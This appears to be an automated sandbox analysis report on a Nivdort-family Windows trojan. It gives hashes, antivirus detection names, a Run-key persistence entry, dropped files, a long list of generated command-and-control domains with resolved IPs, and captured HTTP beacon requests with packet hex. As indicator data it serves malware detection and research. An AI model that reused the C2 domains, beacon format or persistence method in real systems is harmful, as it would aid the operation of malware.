Analysis Date: 2015-10-13 02:40:38
MD5: be312308e48774ec52287d7c81a8f02f
SHA1: b8723f8e255e781d872215d72952683adb56425c

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 9f05b1d8aa4f5ff41e462cf73fe16ab4 sha1: 0a50e074938ed57fcbe415b892f9297fcf0a871b size: 298496
Section .rdata: md5: 3fcd2876c12a487eee833dfc3c28c51e sha1: 57af3ef68d61acc9fcdc2461ab3eef4af14d6b03 size: 34816
Section .data: md5: 6849c68e1edb4dee7ff6a0767d2fabeb sha1: 89143637dc8a08c43dc7d97aad164c714da150b8 size: 95232
Timestamp: 2014-10-30 10:11:56
Packer: Microsoft Visual C++ ?.?
PEhash: 2b2eded05001f4e7d33a36fed36611a01538821c
IMPhash: e1f41eaca6679124fbd6aeeff2612925
AV CA (E-Trust Ino): no_virus
AV F-Secure: Gen:Variant.Symmi.22722
AV Dr. Web: no_virus
AV ClamAV: no_virus
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV BullGuard: Gen:Variant.Symmi.22722
AV Padvish: no_virus
AV VirusBlokAda (vba32): no_virus
AV CAT (quickheal): Trojan.Dynamer.AC3
AV Trend Micro: TSPY_NIVDORT.SMB
AV Kaspersky: Trojan.Win32.Generic
AV Zillya!: no_virus
AV Emsisoft: Gen:Variant.Symmi.22722
AV Ikarus: Trojan.FBAccountLock
AV Frisk (f-prot): no_virus
AV Authentium: W32/Wonton.B.gen!Eldorado
AV MalwareBytes: Trojan.Zbot.WHE
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.Z
AV K7: Trojan ( 004cb2771 )
AV BitDefender: Gen:Variant.Symmi.22722
AV Fortinet: W32/Agent.VNC!tr
AV Symantec: Downloader.Upatre!g15
AV Grisoft (avg): Win32/Cryptor
AV Eset (nod32): Win32/Agent.VNC
AV Alwil (avast): Kryptik-PJW [Trj]
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Rising: no_virus
AV Twister: Trojan.Agent.VNC.aanx.mg
AV Avira (antivir): BDS/Zegost.Gen4
AV Mcafee: Trojan-FEMT!BE312308E487

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Encryption Link Protocol Shell Superfetch ➝ C:\Documents and Settings\Administrator\Application Data\euuoctu\fhnqpgcjimfb.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\euuoctu\fhnqpgcjimfb.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\euuoctu\fhnqpgcjimfb.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\euuoctu\fhnqpgcjimfb.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\euuoctu\jykqfuqpyhv.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\euuoctu\fhnqpgcjimfb.cearx
Creates File: \Device\Afd\Endpoint
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\euuoctu\fhnqpgcjimfb.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\euuoctu\fhnqpgcjimfb.exe"

Network Details:

DNS: morningflower.net (Type: A) ➝ 173.0.129.103
DNS: weatherminute.net (Type: A) ➝ 72.52.4.90
DNS: classminute.net (Type: A) ➝ 208.100.26.234
DNS: thinkadvance.net (Type: A) ➝ 184.168.221.58
DNS: collegeadvance.net (Type: A) ➝ 97.74.42.79
DNS: ratherflower.net (Type: A)
DNS: ratherminute.net (Type: A)
DNS: morningminute.net (Type: A)
DNS: ratherspecial.net (Type: A)
DNS: morningspecial.net (Type: A)
DNS: rathercorner.net (Type: A)
DNS: morningcorner.net (Type: A)
DNS: strangeflower.net (Type: A)
DNS: historyflower.net (Type: A)
DNS: strangeminute.net (Type: A)
DNS: historyminute.net (Type: A)
DNS: strangespecial.net (Type: A)
DNS: historyspecial.net (Type: A)
DNS: strangecorner.net (Type: A)
DNS: historycorner.net (Type: A)
DNS: amountflower.net (Type: A)
DNS: weatherflower.net (Type: A)
DNS: amountminute.net (Type: A)
DNS: amountspecial.net (Type: A)
DNS: weatherspecial.net (Type: A)
DNS: amountcorner.net (Type: A)
DNS: weathercorner.net (Type: A)
DNS: thickflower.net (Type: A)
DNS: classflower.net (Type: A)
DNS: thickminute.net (Type: A)
DNS: thickspecial.net (Type: A)
DNS: classspecial.net (Type: A)
DNS: thickcorner.net (Type: A)
DNS: classcorner.net (Type: A)
DNS: presentadvance.net (Type: A)
DNS: thinkstranger.net (Type: A)
DNS: presentstranger.net (Type: A)
DNS: thinkgoodbye.net (Type: A)
DNS: presentgoodbye.net (Type: A)
DNS: thinkfortieth.net (Type: A)
DNS: presentfortieth.net (Type: A)
DNS: chiefadvance.net (Type: A)
DNS: chiefstranger.net (Type: A)
DNS: collegestranger.net (Type: A)
DNS: chiefgoodbye.net (Type: A)
DNS: collegegoodbye.net (Type: A)
DNS: chieffortieth.net (Type: A)
DNS: collegefortieth.net (Type: A)
DNS: oftenadvance.net (Type: A)
DNS: aloneadvance.net (Type: A)
DNS: oftenstranger.net (Type: A)
DNS: alonestranger.net (Type: A)
DNS: oftengoodbye.net (Type: A)
DNS: alonegoodbye.net (Type: A)
DNS: oftenfortieth.net (Type: A)
DNS: alonefortieth.net (Type: A)
DNS: middleadvance.net (Type: A)
DNS: twelveadvance.net (Type: A)
DNS: middlestranger.net (Type: A)
DNS: twelvestranger.net (Type: A)
DNS: middlegoodbye.net (Type: A)
DNS: twelvegoodbye.net (Type: A)
DNS: middlefortieth.net (Type: A)
DNS: twelvefortieth.net (Type: A)
DNS: ratheradvance.net (Type: A)
DNS: morningadvance.net (Type: A)
DNS: ratherstranger.net (Type: A)
DNS: morningstranger.net (Type: A)
DNS: rathergoodbye.net (Type: A)
DNS: morninggoodbye.net (Type: A)
DNS: ratherfortieth.net (Type: A)
DNS: morningfortieth.net (Type: A)
DNS: strangeadvance.net (Type: A)
DNS: historyadvance.net (Type: A)
DNS: strangestranger.net (Type: A)
DNS: historystranger.net (Type: A)
DNS: strangegoodbye.net (Type: A)
DNS: historygoodbye.net (Type: A)
DNS: strangefortieth.net (Type: A)
DNS: historyfortieth.net (Type: A)
DNS: amountadvance.net (Type: A)
DNS: weatheradvance.net (Type: A)
DNS: amountstranger.net (Type: A)
DNS: weatherstranger.net (Type: A)
DNS: amountgoodbye.net (Type: A)
HTTP GET: http://morningflower.net/index.php?email=merkez@verdihome.com&method=post&len
User-Agent:
HTTP GET: http://weatherminute.net/index.php?email=merkez@verdihome.com&method=post&len
User-Agent:
HTTP GET: http://classminute.net/index.php?email=merkez@verdihome.com&method=post&len
User-Agent:
HTTP GET: http://thinkadvance.net/index.php?email=merkez@verdihome.com&method=post&len
User-Agent:
HTTP GET: http://collegeadvance.net/index.php?email=merkez@verdihome.com&method=post&len
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 173.0.129.103:80
Flows TCP: 192.168.1.1:1032 ➝ 72.52.4.90:80
Flows TCP: 192.168.1.1:1033 ➝ 208.100.26.234:80
Flows TCP: 192.168.1.1:1034 ➝ 184.168.221.58:80
Flows TCP: 192.168.1.1:1035 ➝ 97.74.42.79:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6572 6b657a40 76657264   mail=merkez@verd
0x00000020 (00032)   69686f6d 652e636f 6d266d65 74686f64   ihome.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206d6f 726e696e   se..Host: mornin
0x00000070 (00112)   67666c6f 7765722e 6e65740d 0a0d0a     gflower.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6572 6b657a40 76657264   mail=merkez@verd
0x00000020 (00032)   69686f6d 652e636f 6d266d65 74686f64   ihome.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207765 61746865   se..Host: weathe
0x00000070 (00112)   726d696e 7574652e 6e65740d 0a0d0a     rminute.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6572 6b657a40 76657264   mail=merkez@verd
0x00000020 (00032)   69686f6d 652e636f 6d266d65 74686f64   ihome.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a20636c 6173736d   se..Host: classm
0x00000070 (00112)   696e7574 652e6e65 740d0a0d 0a0d0a     inute.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6572 6b657a40 76657264   mail=merkez@verd
0x00000020 (00032)   69686f6d 652e636f 6d266d65 74686f64   ihome.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207468 696e6b61   se..Host: thinka
0x00000070 (00112)   6476616e 63652e6e 65740d0a 0d0a0a     dvance.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6572 6b657a40 76657264   mail=merkez@verd
0x00000020 (00032)   69686f6d 652e636f 6d266d65 74686f64   ihome.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a20636f 6c6c6567   se..Host: colleg
0x00000070 (00112)   65616476 616e6365 2e6e6574 0d0a0d0a   eadvance.net....
Strings